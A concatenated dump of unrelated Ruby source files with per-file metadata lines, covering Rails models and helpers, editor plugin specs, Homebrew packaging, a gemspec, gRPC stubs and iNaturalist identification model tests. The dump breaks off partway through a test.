has_many :workout_schedules
has_many :workouts,through: :workout_schedules
accepts_nested_attributes_for :workouts
end
| 21.272727 | 48 | 0.816239 |
7ab152a9eac68d19803c095822118e4e242fb616 | 1,499 | # frozen_string_literal: true
module EE
module Mutations
module Boards
module Lists
module Create
extend ActiveSupport::Concern
extend ::Gitlab::Utils::Override
prepended do
argument :milestone_id, ::Types::GlobalIDType[::Milestone],
required: false,
description: 'Global ID of an existing milestone.'
argument :iteration_id, ::Types::GlobalIDType[::Iteration],
required: false,
description: 'Global ID of an existing iteration.'
argument :assignee_id, ::Types::GlobalIDType[::User],
required: false,
description: 'Global ID of an existing user.'
end
private
override :create_list_params
def create_list_params(args)
params = super
params[:milestone_id] &&= ::GitlabSchema.parse_gid(params[:milestone_id], expected_type: ::Milestone).model_id
params[:iteration_id] &&= ::GitlabSchema.parse_gid(params[:iteration_id], expected_type: ::Iteration).model_id
params[:assignee_id] &&= ::GitlabSchema.parse_gid(params[:assignee_id], expected_type: ::User).model_id
params
end
override :mutually_exclusive_args
def mutually_exclusive_args
super + [:milestone_id, :iteration_id, :assignee_id]
end
end
end
end
end
end
| 33.311111 | 122 | 0.587725 |
3893bd3a325324e37287bb093667f1b1a67d0629 | 3,470 | require 'spec_helper'
describe "regression tests" do
describe "python" do
let(:filename) { 'test.py' }
specify "brackets inside parentheses" do
# See https://github.com/AndrewRadev/sideways.vim/issues/4
set_file_contents <<-EOF
foo([ 'bar', 'baz', 'quux' ])
EOF
vim.search('baz')
vim.left
assert_file_contents <<-EOF
foo([ 'baz', 'bar', 'quux' ])
EOF
end
end
describe "java" do
let(:filename) { 'test.java' }
# See https://github.com/AndrewRadev/sideways.vim/issues/24
specify "unbalanced brackets in strings" do
set_file_contents <<-EOF
Debug.Log(string.Format("1) Item: {0}"), item);
EOF
vim.search('item')
vim.right
assert_file_contents <<-EOF
Debug.Log(item, string.Format("1) Item: {0}"));
EOF
end
# See https://github.com/AndrewRadev/sideways.vim/issues/24
specify "escaped quotes" do
set_file_contents <<-EOF
Debug.Log(string.Format("1\\" Item: {0}"), item);
EOF
vim.search('item')
vim.right
assert_file_contents <<-EOF
Debug.Log(item, string.Format("1\\" Item: {0}"));
EOF
end
# See https://github.com/AndrewRadev/sideways.vim/issues/24
specify "empty quotes" do
set_file_contents <<-EOF
Debug.Log(
"",
one,
two);
return "";
EOF
vim.search('one')
vim.left
assert_file_contents <<-EOF
Debug.Log(
one,
"",
two);
return "";
EOF
end
end
describe "coffee" do
let(:filename) { 'test.coffee' }
specify "nested curly brackets" do
set_file_contents <<-EOF
foo = { one: two, three: { four: five } }
EOF
vim.search('three')
vim.left
assert_file_contents <<-EOF
foo = { three: { four: five }, one: two }
EOF
end
end
describe "ruby" do
let(:filename) { 'test.rb' }
specify "default arguments" do
set_file_contents <<-EOF
def initialize(attributes = {}, options = {})
EOF
vim.search('options')
vim.left
assert_file_contents <<-EOF
def initialize(options = {}, attributes = {})
EOF
end
specify "delimiters on next line" do
set_file_contents <<-EOF
foo = [ one
, two
, three
]
EOF
vim.search('two')
vim.left
assert_file_contents <<-EOF
foo = [ two
, one
, three
]
EOF
end
end
describe "javascript" do
let(:filename) { 'test.js' }
# See https://github.com/AndrewRadev/sideways.vim/issues/31
specify "empty () after opening (" do
set_file_contents <<-EOF
foo(() => { bar(baz); }, qwe);
EOF
vim.search('qwe')
vim.left
assert_file_contents <<-EOF
foo(qwe, () => { bar(baz); });
EOF
end
end
describe "html" do
let(:filename) { 'test.html' }
# See https://github.com/AndrewRadev/sideways.vim/issues/39
specify "no leading whitespace, first item is the last char of the start pattern" do
set_file_contents <<-EOF
<form
id="formid"
name="myform">
EOF
vim.search('id=')
vim.left
assert_file_contents <<-EOF
<form
name="myform"
id="formid">
EOF
end
end
end
| 20.532544 | 88 | 0.538905 |
87b339f57388be51d515b3aa0c08bb3acc03cb70 | 85 | json.array! @confirmations, partial: 'confirmations/confirmation', as: :confirmation
| 42.5 | 84 | 0.8 |
6233eefe5d6e48574bcff8d628d17763b1573377 | 790 | require('pry')
class Scene < ActiveRecord::Base
belongs_to(:quest)
has_many(:observations)
define_method(:options) do
options = []
Scene.all.each do |scene|
if scene.previous_scene == self.id
options.push(scene)
end
end
options
end
define_method(:required_observations?) do
required = []
observations.each do |observation|
if observation.required == true
required.push(observation.id)
end
end
required
end
define_method(:render_menu) do
s = ''
self.options.each do |option|
s << '<li><a href="/' + self.quest.user_id.to_s + '/scenes/' + option.id.to_s + '/edit">' + option.name + '</a></li>'
s << '<ul>'
s << (option.render_menu())
s << '</ul>'
end
s
end
end
| 21.351351 | 123 | 0.588608 |
f81f7a91e53a47da2638c0e5fb5e9377cc48bd79 | 387 | cask 'sleepyhead' do
version '1.0.0-beta-2.2,20160421'
sha256 '182b818143815b4da5e02260e35832afc9787610a9fb5aba07b309923f01b54b'
url "https://sleepyhead.jedimark.net/releases/SleepyHead-#{version.before_comma}-Snapshot-MacOSX-#{version.after_comma}.dmg"
name 'SleepyHead OpenSource CPAP Review Software'
homepage 'https://sleepyhead.jedimark.net/'
app 'SleepyHead.app'
end
| 35.181818 | 126 | 0.790698 |
7908a586cc2a798014123b667d2ec4ee1cf2a28a | 827 | # Require any additional compass plugins here.
# Set this to the root of your project when deployed:
css_dir = "css"
sass_dir = "css/scss"
images_dir = "img"
javascripts_dir = "js"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.458333 | 96 | 0.753325 |
d5821f5ae1a999b68e6d946cf834faa552190e89 | 2,160 | # -*- encoding: utf-8 -*-
# stub: commonmarker 0.17.13 ruby lib ext
# stub: ext/commonmarker/extconf.rb
Gem::Specification.new do |s|
s.name = "commonmarker".freeze
s.version = "0.17.13"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze, "ext".freeze]
s.authors = ["Garen Torikian".freeze, "Ashe Connor".freeze]
s.date = "2018-09-10"
s.description = "A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.".freeze
s.executables = ["commonmarker".freeze]
s.extensions = ["ext/commonmarker/extconf.rb".freeze]
s.files = ["bin/commonmarker".freeze, "ext/commonmarker/extconf.rb".freeze]
s.homepage = "http://github.com/gjtorikian/commonmarker".freeze
s.licenses = ["MIT".freeze]
s.rdoc_options = ["-x".freeze, "ext/commonmarker/cmark/.*".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0.0".freeze)
s.rubygems_version = "3.2.20".freeze
s.summary = "CommonMark parser and renderer. Written in C, wrapped in Ruby.".freeze
s.installed_by_version = "3.2.20" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.6"])
s.add_development_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.2"])
s.add_development_dependency(%q<json>.freeze, ["~> 1.8.1"])
s.add_development_dependency(%q<awesome_print>.freeze, [">= 0"])
s.add_development_dependency(%q<rdoc>.freeze, ["~> 5.1"])
else
s.add_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
s.add_dependency(%q<minitest>.freeze, ["~> 5.6"])
s.add_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.2"])
s.add_dependency(%q<json>.freeze, ["~> 1.8.1"])
s.add_dependency(%q<awesome_print>.freeze, [">= 0"])
s.add_dependency(%q<rdoc>.freeze, ["~> 5.1"])
end
end
| 45 | 116 | 0.683333 |
7a51915a7ae9d30416a1c0c27101813f4a33566c | 2,864 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# Source: google/cloud/recaptchaenterprise/v1/recaptchaenterprise.proto for package 'Google.Cloud.RecaptchaEnterprise.V1'
# Original file comments:
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'grpc'
require 'google/cloud/recaptchaenterprise/v1/recaptchaenterprise_pb'
module Google
module Cloud
module RecaptchaEnterprise
module V1
module RecaptchaEnterpriseService
# Service to determine the likelihood an event is legitimate.
class Service
include GRPC::GenericService
self.marshal_class_method = :encode
self.unmarshal_class_method = :decode
self.service_name = 'google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService'
# Creates an Assessment of the likelihood an event is legitimate.
rpc :CreateAssessment, Google::Cloud::RecaptchaEnterprise::V1::CreateAssessmentRequest, Google::Cloud::RecaptchaEnterprise::V1::Assessment
# Annotates a previously created Assessment to provide additional information
# on whether the event turned out to be authentic or fradulent.
rpc :AnnotateAssessment, Google::Cloud::RecaptchaEnterprise::V1::AnnotateAssessmentRequest, Google::Cloud::RecaptchaEnterprise::V1::AnnotateAssessmentResponse
# Creates a new reCAPTCHA Enterprise key.
rpc :CreateKey, Google::Cloud::RecaptchaEnterprise::V1::CreateKeyRequest, Google::Cloud::RecaptchaEnterprise::V1::Key
# Returns the list of all keys that belong to a project.
rpc :ListKeys, Google::Cloud::RecaptchaEnterprise::V1::ListKeysRequest, Google::Cloud::RecaptchaEnterprise::V1::ListKeysResponse
# Returns the specified key.
rpc :GetKey, Google::Cloud::RecaptchaEnterprise::V1::GetKeyRequest, Google::Cloud::RecaptchaEnterprise::V1::Key
# Updates the specified key.
rpc :UpdateKey, Google::Cloud::RecaptchaEnterprise::V1::UpdateKeyRequest, Google::Cloud::RecaptchaEnterprise::V1::Key
# Deletes the specified key.
rpc :DeleteKey, Google::Cloud::RecaptchaEnterprise::V1::DeleteKeyRequest, Google::Protobuf::Empty
end
Stub = Service.rpc_stub_class
end
end
end
end
end
| 48.542373 | 170 | 0.719623 |
1c99c96970d91f983a79934f25da26760c39959c | 833 | #!/usr/bin/env ruby
require_relative './../spec/spec_helper'
class Base
include ROXML
xml_convention :dasherize
xml_namespace 'aws'
end
class WeatherObservation < Base
xml_name 'ob'
xml_reader :temperature, :as => Float, :from => 'aws:temp'
xml_reader :feels_like, :as => Integer
xml_reader :current_condition #, :attributes => {:icon => String} # pending
end
class Weather < Base
xml_reader :observation, :as => WeatherObservation, :required => true
end
unless defined?(RSpec)
current_weather = Weather.from_xml(xml_for('current_weather')).observation
puts "temperature: #{current_weather.temperature}"
puts "feels_like: #{current_weather.feels_like}"
puts "current_condition: #{current_weather.current_condition}"
# puts "current_condition.icon: #{current_weather.current_condition.icon}" # pending
end | 30.851852 | 85 | 0.751501 |
038dd149460d8a56d6154ab9fc9055bb4fbab547 | 1,622 | class Dopewars < Formula
desc 'Free rewrite of a game originally based on "Drug Wars"'
homepage "https://dopewars.sourceforge.io"
url "https://downloads.sourceforge.net/project/dopewars/dopewars/1.6.1/dopewars-1.6.1.tar.gz"
sha256 "83127903a61d81cda251a022f9df150d11e27bdd040e858c09c57927cc0edea6"
license "GPL-2.0-or-later"
bottle do
sha256 arm64_big_sur: "490e166c6e7a12f93f51271b80aca3d3e6471089e51f77ba30db1ebce1861dcd"
sha256 big_sur: "390ce7a719041ebf745d790ea872db927cb587cfc91ddab183472fe2ceecec43"
sha256 catalina: "85d6516b31e2bd45f92d2e2c18f773ec2b2990b25da82155454274e8c65eaa3d"
sha256 mojave: "abe0910c15903b12be25d3b00f4544f39d10b894c5b773468b7b52e3c403893b"
sha256 x86_64_linux: "97c20d070dace0f2718d7d3bd7e7e36624b9cdbfea8a553ce4bce26cffcf261d"
end
depends_on "pkg-config" => :build
depends_on "glib"
uses_from_macos "curl"
def install
inreplace "src/Makefile.in", "$(dopewars_DEPENDENCIES)", ""
inreplace "auxbuild/ltmain.sh", "need_relink=yes", "need_relink=no"
inreplace "src/plugins/Makefile.in", "LIBADD =", "LIBADD = -module -avoid-version"
system "./configure", "--disable-gui-client",
"--disable-gui-server",
"--enable-plugins",
"--enable-networking",
"--prefix=#{prefix}",
"--mandir=#{man}",
"--disable-debug",
"--disable-dependency-tracking"
system "make", "install"
end
test do
system "#{bin}/dopewars", "-v"
end
end
| 40.55 | 95 | 0.662762 |
39ea2a43348c244d90bd88f5d60b8785cb77c0cc | 1,956 | # frozen_string_literal: true
RSpec.describe Operations::And do
subject(:operation) { Operations::And.new(left, right) }
include_context 'predicates'
let(:left) { Rule::Predicate.build(int?) }
let(:right) { Rule::Predicate.build(gt?).curry(18) }
describe '#call' do
it 'calls left and right' do
expect(operation.(18)).to be_failure
end
end
describe '#to_ast' do
it 'returns ast' do
expect(operation.to_ast).to eql(
[:and, [[:predicate, [:int?, [[:input, Undefined]]]], [:predicate, [:gt?, [[:num, 18], [:input, Undefined]]]]]]
)
end
it 'returns result ast' do
expect(operation.('18').to_ast).to eql(
[:and, [[:predicate, [:int?, [[:input, '18']]]], [:hint, [:predicate, [:gt?, [[:num, 18], [:input, '18']]]]]]]
)
expect(operation.with(hints: false).('18').to_ast).to eql(
[:predicate, [:int?, [[:input, '18']]]]
)
expect(operation.(18).to_ast).to eql(
[:predicate, [:gt?, [[:num, 18], [:input, 18]]]]
)
end
it 'returns failure result ast' do
expect(operation.with(id: :age).('18').to_ast).to eql(
[:failure, [:age, [:and, [[:predicate, [:int?, [[:input, '18']]]], [:hint, [:predicate, [:gt?, [[:num, 18], [:input, '18']]]]]]]]]
)
expect(operation.with(id: :age).(18).to_ast).to eql(
[:failure, [:age, [:predicate, [:gt?, [[:num, 18], [:input, 18]]]]]]
)
end
end
describe '#and' do
let(:other) { Rule::Predicate.build(lt?).curry(30) }
it 'creates and with the other' do
expect(operation.and(other).(31)).to be_failure
end
end
describe '#or' do
let(:other) { Rule::Predicate.build(lt?).curry(14) }
it 'creates or with the other' do
expect(operation.or(other).(13)).to be_success
end
end
describe '#to_s' do
it 'returns string representation' do
expect(operation.to_s).to eql('int? AND gt?(18)')
end
end
end
| 27.549296 | 138 | 0.562372 |
11028d95cb8f973d903f31da300597b7fa1e7ccc | 1,576 | module RsvpTemplatesHelper
def col_widths
[75, 150, 150, 150, 75]
end
def span_wrap_header(text, col)
width = col_widths[col]
"<span style='display: inline-block; width: #{width}px; font-size: 10px; font-weight: bold;'>#{text}</span>"
end
def span_wrap_row(text, col)
width = col_widths[col]
"<span style='display: inline-block; width: #{width}px; font-size: 10px;'>#{text}</span>"
end
def dump_table_headers
table_headers = %w(Name Prompt Yes\ Prompt No\ Prompt Action)
hdr = table_headers.each_with_index.map {|item, index| span_wrap_header(item, index)}.join
"<span style='display: inline-block; width:15px;'> </span>#{hdr}"
end
def row_action(template)
edit = link_to "EDIT", edit_rsvp_template_path(template)
delete = link_to "DELETE", rsvp_template_path(template), :method => :delete
"#{edit} | #{delete}"
end
def dump_table_row(template)
handle = "<span class=sort_handle><img class=sort_handle src='/images/handle.png'></span> "
row = span_wrap_row(template.name, 0) +
span_wrap_row(template.prompt, 1) +
span_wrap_row(template.yes_prompt, 2) +
span_wrap_row(template.no_prompt, 3) +
span_wrap_row(row_action(template), 4)
"<li class='rsvpLi' id='template_#{template.id}'>#{handle}#{row}</li>"
end
def dump_table_rows
rows = @templates.map {|x| dump_table_row(x)}.join('')
"<div id='sortable_templates'>#{rows}</div>"
end
def template_output
"#{dump_table_headers}<br/>#{dump_table_rows}"
end
end
| 32.163265 | 112 | 0.658629 |
b93abeaaa388e639562bb451ee178d804b65524a | 47,432 | require "spec_helper"
describe Identification, "creation" do
describe "without callbacks" do
it "should store the previous observation taxon" do
o = make_research_grade_observation
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should not create a blank preference when vision is nil" do
i = Identification.make!( vision: nil )
expect( i.stored_preferences ).to be_blank
end
describe "with an inactive taxon" do
it "should replace the taxon with its active equivalent" do
taxon_change = make_taxon_swap
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.output_taxon
end
it "should not replace the taxon if there is no active equivalent" do
inactive_taxon = Taxon.make!( is_active: false )
expect( Identification.make!( taxon: inactive_taxon ).taxon ).to eq inactive_taxon
end
it "should not replace the taxon if there are multiple active equivalents" do
taxon_change = make_taxon_split
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.input_taxon
end
end
end
describe "with callbacks" do
it "should make older identifications not current" do
old_ident = Identification.make!
new_ident = Identification.make!( observation: old_ident.observation, user: old_ident.user )
expect( new_ident ).to be_valid
expect( new_ident ).to be_current
old_ident.reload
expect( old_ident ).not_to be_current
end
it "should not allow 2 current observations per user" do
ident1 = Identification.make!
ident2 = Identification.make!( user: ident1.user, observation: ident1.observation )
ident1.reload
ident2.reload
expect( ident1 ).not_to be_current
expect( ident2 ).to be_current
ident1.update_attributes( current: true )
ident1.reload
ident2.reload
expect( ident1 ).to be_current
expect( ident2 ).not_to be_current
end
it "should add a taxon to its observation if it's the observer's identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
identification = Identification.make!(:user => obs.user, :observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
end
it "should add a taxon to its observation if it's someone elses identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
expect(obs.community_taxon).to be_blank
end
it "shouldn't add a taxon to its observation if it's someone elses identification but the observation user rejects community IDs" do
u = User.make!(:prefers_community_taxa => false)
obs = Observation.make!(:user => u)
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
end
it "shouldn't create an ID by the obs owner if someone else adds an ID" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.identifications.count).to eq 0
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).not_to be_blank
expect(obs.identifications.count).to eq 1
end
it "should not modify species_guess to an observation if there's a taxon_id and the taxon_id didn't change" do
obs = Observation.make!
taxon = Taxon.make!
taxon2 = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
user = User.make!
identification = Identification.make!(
:user => user,
:observation => obs,
:taxon => taxon2
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add a species_guess to a newly identified observation if the owner identified it and the species_guess was nil" do
obs = Observation.make!
taxon = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add an iconic_taxon_id to its observation if it's the observer's identification" do
obs = Observation.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs
)
obs.reload
expect(obs.iconic_taxon_id).to eq identification.taxon.iconic_taxon_id
end
it "should increment the observations num_identification_agreements if this is an agreement" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_count = obs.num_identification_agreements
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_count+1
end
it "should increment the observation's num_identification_agreements if this is an agreement and there are outdated idents" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_ident = Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq(1)
obs.reload
Identification.make!(:observation => obs, :user => old_ident.user)
obs.reload
expect(obs.num_identification_agreements).to eq(0)
end
it "should increment the observations num_identification_disagreements if this is a disagreement" do
obs = Observation.make!(:taxon => Taxon.make!)
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count+1
end
it "should NOT increment the observations num_identification_disagreements if the obs has no taxon" do
obs = Observation.make!
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count
end
it "should NOT increment the observations num_identification_agreements or num_identification_disagreements if theres just one ID" do
taxon = Taxon.make!
obs = Observation.make!
old_agreement_count = obs.num_identification_agreements
old_disagreement_count = obs.num_identification_disagreements
expect(obs.community_taxon).to be_blank
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_agreement_count
expect(obs.num_identification_disagreements).to eq old_disagreement_count
expect(obs.community_taxon).to be_blank
expect(obs.identifications.count).to eq 1
end
it "should consider an identification with a taxon that is a child of " +
"the observation's taxon to be in agreement" do
taxon = Taxon.make!(rank: Taxon::SPECIES)
parent = Taxon.make!(rank: Taxon::GENUS)
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => parent, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => taxon)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be true
end
it "should not consider an identification with a taxon that is a parent " +
"of the observation's taxon to be in agreement" do
taxon = Taxon.make!
parent = Taxon.make!
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => taxon, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => parent)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be false
end
it "should not consider identifications of different taxa in the different lineages to be in agreement" do
taxon = Taxon.make!( rank: Taxon::GENUS )
child = Taxon.make!( parent: taxon, rank: Taxon::SPECIES)
o = Observation.make!(:prefers_community_taxon => false)
ident = Identification.make!(:taxon => child, :observation => o)
disagreement = Identification.make!(:observation => o, :taxon => taxon)
expect(disagreement.is_agreement?).to be false
end
it "should update observation quality_grade" do
o = make_research_grade_candidate_observation(taxon: Taxon.make!(rank: Taxon::SPECIES))
expect( o.quality_grade ).to eq Observation::NEEDS_ID
i = Identification.make!(:observation => o, :taxon => o.taxon)
o.reload
expect( o.quality_grade ).to eq Observation::RESEARCH_GRADE
end
it "should trigger setting a taxon photo if obs became research grade" do
t = Taxon.make!( rank: Taxon::SPECIES )
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 0
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should not trigger setting a taxon photo if obs was already research grade" do
o = without_delay { make_research_grade_observation }
o.taxon.taxon_photos.delete_all
expect( o.taxon.photos.count ).to eq 0
i = without_delay { Identification.make!( observation: o, taxon: o.taxon ) }
o.reload
expect( o.taxon.photos.count ).to eq 0
end
it "should not trigger setting a taxon photo if taxon already has a photo" do
t = Taxon.make!( rank: Taxon::SPECIES )
t.photos << LocalPhoto.make!
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 1
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should update observation quality grade after disagreement when observer opts out of CID" do
g = create :taxon, :as_genus
s1 = create :taxon, :as_species, parent: g
s2 = create :taxon, :as_species, parent: g
o = make_research_grade_observation( prefers_community_taxon: false, taxon: s1 )
expect( o ).to be_research_grade
2.times { create( :identification, observation: o, taxon: s2 ) }
o.reload
expect( o ).not_to be_research_grade
o.owners_identification.destroy
o.reload
expect( o.owners_identification ).to be_blank
create( :identification, user: o.user, observation: o, taxon: s2 )
o.reload
expect( o ).to be_research_grade
end
it "should obscure the observation's coordinates if the taxon is threatened" do
o = Observation.make!(:latitude => 1, :longitude => 1)
expect(o).not_to be_coordinates_obscured
i = Identification.make!(:taxon => make_threatened_taxon, :observation => o, :user => o.user)
o.reload
expect(o).to be_coordinates_obscured
end
it "should set the observation's community taxon" do
t = Taxon.make!
o = Observation.make!(:taxon => t)
expect(o.community_taxon).to be_blank
i = Identification.make!(:observation => o, :taxon => t)
o.reload
expect(o.community_taxon).to eq(t)
end
it "should touch the observation" do
o = Observation.make!
updated_at_was = o.updated_at
op = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(updated_at_was).to be < o.updated_at
end
it "creates observation reviews if they dont exist" do
o = Observation.make!
expect(o.observation_reviews.count).to eq 0
Identification.make!(observation: o, user: o.user)
o.reload
expect(o.observation_reviews.count).to eq 1
end
it "updates existing reviews" do
o = Observation.make!
r = ObservationReview.make!(observation: o, user: o.user, updated_at: 1.day.ago)
Identification.make!(observation: o, user: o.user)
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first.updated_at ).to be > r.updated_at
end
it "marks existing unreviewed reviews as reviewed" do
o = Observation.make!
r = ObservationReview.make!( observation: o, user: o.user )
r.update_attributes( reviewed: false )
Identification.make!( observation: o, user: o.user )
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first ).to be_reviewed
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Delayed::Worker.new.work_off
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the observation's taxon_geoprivacy if taxon was threatened" do
t = make_threatened_taxon
o = Observation.make!
expect( o.taxon_geoprivacy ).to be_blank
i = Identification.make!( taxon: t, observation: o )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
describe "with indexing" do
elastic_models( Observation, Identification )
it "should make older identifications not current in elasticsearch" do
old_ident = Identification.make!
without_delay do
Identification.make!( observation: old_ident.observation, user: old_ident.user )
end
es_response = Identification.elastic_search( where: { id: old_ident.id } ).results.results.first
expect( es_response.id.to_s ).to eq old_ident.id.to_s
old_ident.reload
expect( old_ident ).not_to be_current
expect( es_response.current ).to be false
end
describe "user counter cache" do
it "should incremement for an ident on someone else's observation, with delay" do
taxon = Taxon.make!
obs = Observation.make!(taxon: taxon)
user = User.make!
Delayed::Job.destroy_all
expect( Delayed::Job.count ).to eq 0
expect( user.identifications_count ).to eq 0
Identification.make!(user: user, observation: obs, taxon: taxon)
expect( Delayed::Job.count ).to be > 1
user.reload
expect( user.identifications_count ).to eq 0
Delayed::Worker.new.work_off
user.reload
expect( user.identifications_count ).to eq 1
end
it "should NOT incremement for an ident on one's OWN observation" do
user = User.make!
obs = Observation.make!(user: user)
expect {
without_delay{ Identification.make!(user: user, observation: obs) }
}.to_not change(user, :identifications_count)
end
end
end
end
end
describe Identification, "updating" do
it "should not change current status of other identifications" do
i1 = Identification.make!
i2 = Identification.make!(:observation => i1.observation, :user => i1.user)
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
i1.update_attributes(:body => "foo")
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
end
describe "observation taxon_geoprivacy" do
it "should change if becomes current" do
threatened = make_threatened_taxon( rank: Taxon::SPECIES )
not_threatened = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: threatened )
i1 = o.identifications.first
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
i2 = Identification.make!( user: i1.user, observation: o, taxon: not_threatened )
o.reload
expect( o.taxon_geoprivacy ).to be_blank
i1.reload
i1.update_attributes( current: true )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
end
end
describe Identification, "deletion" do
it "should remove the taxon associated with the observation if it's the observer's identification and obs does not prefers_community_taxon" do
observation = Observation.make!( taxon: Taxon.make!, prefers_community_taxon: false )
identification = Identification.make!( observation: observation, taxon: observation.taxon )
expect( observation.taxon ).not_to be_blank
expect( observation ).to be_valid
expect( observation.identifications.length ).to be >= 1
doomed_ident = observation.identifications.select do |ident|
ident.user_id == observation.user_id
end.first
expect( doomed_ident.user_id ).to eq observation.user_id
doomed_ident.destroy
observation.reload
expect( observation.taxon_id ).to be_blank
end
it "should NOT remove the taxon associated with the observation if it's the observer's identification and obs prefers_community_taxon " do
observation_prefers_community_taxon = Observation.make!( taxon: Taxon.make! )
identification_prefers_community_taxon = Identification.make!(
observation: observation_prefers_community_taxon,
taxon: observation_prefers_community_taxon.taxon
)
expect( observation_prefers_community_taxon.taxon ).not_to be_nil
expect( observation_prefers_community_taxon ).to be_valid
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.identifications.length ).to be >= 1
doomed_ident = observation_prefers_community_taxon.identifications.select do |ident|
ident.user_id == observation_prefers_community_taxon.user_id
end.first
expect( doomed_ident.user_id ).to eq observation_prefers_community_taxon.user_id
doomed_ident.destroy
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.taxon_id ).not_to be_nil
end
it "should decrement the observation's num_identification_agreements if this was an agreement" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
expect( o.num_identification_agreements ).to eq 1
i.destroy
o.reload
